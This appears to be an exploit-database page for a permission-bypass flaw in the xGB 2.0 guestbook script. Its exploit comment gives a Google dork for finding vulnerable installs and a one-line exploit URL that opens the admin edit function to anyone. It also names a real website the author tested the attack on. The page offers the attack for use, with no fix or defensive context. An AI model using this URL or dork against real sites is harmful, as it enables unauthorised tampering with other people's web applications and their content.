[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability

Author
DarkFuneral
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2096
Category
web applications
Date add
28-08-2007
Platform
unsorted
========================================================
xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
========================================================



/*
*
* xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
* Bug discovered by DarkFuneral
*
* Affected Software: xGB
* CMS Site: "i don't know! :P"
* Severity: Critical
* Description: An attacker can edit all message in xGB
* Google Dork: allinurl:"xGb.php"
* 
*
* Exploit Code: http://www.site.com/path/xGB.php?act=admin&do=edit
*
*
*
* Tested on www.culturebeach.de/guestbook.php
*
* Special Greetz to SystemFAILURE because I Love Him...
*
*/


#  0day.today [2024-07-08]  #